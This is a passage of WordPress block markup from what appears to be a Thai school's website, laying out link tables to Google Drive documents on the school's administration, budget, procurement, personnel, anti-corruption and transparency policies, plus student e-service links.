--></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5} -->\n<h5 class=\"wp-block-heading has-text-align-center\"><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=sharing\">แผนปฏิบัติการประจำปีการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5,\"align\":\"full\"} -->\n<h5 class=\"wp-block-heading alignfull has-text-align-center\"><a href=\"https://drive.google.com/file/d/1q0z8a2Mbu3x-c8vLwrElwX6v8BJY7jtB/view?usp=sharing\">แผนพัฒนาการจัดการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"3298cf22\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"ea4e4ab8\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br><a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=sharing\">     - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=sharing\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1l-VlfXu6thxBFvL0JpgAcCUrTrqNNp4G/view?usp=sharing\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1AeKeechkWj0RdYe5xvMgrFXsQiTu26xV/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery 